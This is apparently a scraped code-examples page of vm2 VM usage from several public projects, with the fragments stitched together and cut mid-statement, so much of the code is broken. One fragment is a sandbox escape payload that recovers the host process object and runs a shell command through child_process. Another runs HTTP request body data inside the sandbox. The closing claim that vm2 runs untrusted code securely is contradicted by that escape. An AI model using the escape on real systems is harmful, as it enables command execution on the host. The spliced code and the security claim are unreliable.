How to use the vm2.VM function in vm2
To help you get started, we’ve selected a few vm2 examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
wavebox / waveboxapp / src / app / src / Extensions / Chrome / CRExtensionRuntime / CRExtensionWebRequest / CRExtensionWebRequest.js View on Github 
url: details.url,
method: details.method,
frameId: 0,
parentFrameId: -1,
tabId: details.webContentsId,
type: details.resourceType,
timeStamp: details.timestamp
}
const lambdaScript = `
(function(request) {
${this._blockingOnBeforeRequestScript.js}
})(${JSON.stringify(request)})
`
// Run our guest code
const vm = new VM()
let modifier
try {
modifier = vm.run(lambdaScript)
} catch (ex) {
this._blockingOnBeforeRequestErrorSuppress.total++
if (new Date().getTime() - this._blockingOnBeforeRequestErrorSuppress.last > BLOCKING_ON_BEFORE_REQUEST_ERROR_SUPPRESS_MS) {
this._blockingOnBeforeRequestErrorSuppress.last = new Date().getTime()
console.error([
`Extension Error: Failed to execute blocking onBeforeRequest for extension`,
` Extension ID: ${this.extension.id}`,
` Subsequent errors will not be reported for another ${BLOCKING_ON_BEFORE_REQUEST_ERROR_SUPPRESS_MS}ms`,
` Total Errorred runs: ${this._blockingOnBeforeRequestErrorSuppress.total}`,
` Below is a log of the failed code:`,
' ---------------',
'',
lambdaScript,// handle.cssFile = path.resolve(frameName, "..", name);
// wxAppCode[name]();
// }
let wxAppCode = {};
let handle = {cssFile: name};
let gg = new GwxCfg();
let tsandbox = {
$gwx: GwxCfg.prototype["$gwx"],
__mainPageFrameReady__: GwxCfg.prototype["$gwx"], //解决 $gwx is not defined
__vd_version_info__: GwxCfg.prototype["$gwx"], //解决 __vd_version_info__ is not defined
__wxAppCode__: wxAppCode,
setCssToHead: cssRebuild.bind(handle)
}
let vm = new VM({sandbox: tsandbox});
vm.run(code);
for (let name in wxAppCode) {
if (name.endsWith(".wxss")) {
handle.cssFile = path.resolve(frameName, "..", name);
wxAppCode[name]();
}
}
}
function preRun(dir,frameFile,mainCode,files,cb){function getInjectedAPP_CONFIG(body: string) {
const $ = load(body);
const scriptContent = $("script#app-config").html();
const vm = new VM({ sandbox: { window: {} } });
vm.run(scriptContent!);
return vm.run("window.APP_CONFIG");
}function getWorkerPath(name){
let code=fs.readFileSync(name,{encoding:'utf8'});
let commPath=false;
let vm=new VM({sandbox:{
require(){},
define(name){
name=path.dirname(name)+'/';
if(commPath===false)commPath=name;
commPath=wu.commonDir(commPath,name);
}
}});
vm.run(code.slice(code.indexOf("define(")));
if(commPath.length>0)commPath=commPath.slice(0,-1);
console.log("Worker path: \""+commPath+"\"");
return commPath;
}
function doConfig(configFile,cb){}
const webhookResponse = await agentService.converseCallWebhook({
url: webhook.webhookUrl,
templatePayload: webhook.webhookPayload,
payloadType: webhook.webhookPayloadType,
method: webhook.webhookVerb,
headers: webhook.webhookHeaders,
username: webhook.webhookUser ? webhook.webhookUser : undefined,
password: webhook.webhookPassword ? webhook.webhookPassword : undefined,
templateContext: CSO
});
CSO.webhook = {
[webhook.webhookKey]: { ...webhookResponse }
};
if (webhook.postScript) {
const vm = new VM({
timeout: 1000,
sandbox: {
CSO
}
});
const script = new VMScript(webhook.postScript);
try {
CSO = vm.run(script);
} catch (err) {
console.error(`Failed to execute postScript of the webhook ${webhook.webhookKey}`, err);
}
}
if (webhookResponse.textResponse) {
return { slots: CSO.context.actionQueue[CSO.actionIndex].slots, textResponse: webhookResponse.textResponse, actions: webhookResponse.actions ? webhookResponse.actions : [], fulfilled: true, webhook: { [webhook.webhookKey]: webhookResponse } };
}throw Buffer.from;
this.t=true;
return Object.getPrototypeOf(target);
}
})
});
}catch(e){
process = e.constructor("return process")();
}
process.mainModule.require("child_process").execSync("whoami").toString()
`;
var untrusted3 ="let a=1\nlet b =a\na+b";
var untrusted ="let a=1\nlet b=a\na+b";
try{
console.log(new VM().run(untrusted));
}catch(x){
console.log(x);
}
app.post('/pdf-report', function (req, res) {
if (!program.disableScriptsExecuting) {
try {
var script = new vm.VM();
var data = script.run(req.body.data);
script = null;
} catch (e) {
logger.error('PDF config evaluating failed. DataL %s', req.body.data, e);
res.status(500).send({error: e.message});
return;
}
} else {
logger.warn('Script executing disabled.');
res.status(500).send({error: 'Script executing disabled.'});
return;
}
convertCharts(data, function(dd) {
try {
var pdfDoc = printer.createPdfKitDocument(dd);function createNormalVM(input) {
var _vm = new vm2.VM(input.options);
if (input.code) {
_vm.run(input.code);
}
var vm = {
run({code}) {
return {
value: _vm.run(code)
};
},
call({functionName, args}) {
return {
value: _vm.run(functionName)(...args)
};
}
};
return {module.exports = function evalInVM(code, context = {}, env = {}) {
const vm = new VM({
timeout: 1000,
sandbox: context,
builtin: ['*']
});
/*
* Try and run the code in the sandbox.
* Because undefined top-level properties are effectively undeclared
* we catch those errors, add a declaration at the top of the code
* block and then try again with those vars now declared, but undefined,
* which is the expected behaviour in this scenario.
* TODO: is there a nicer way to handle this?
*/
try {
return vm.run(code);
} catch (err) {vm2
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Securely!
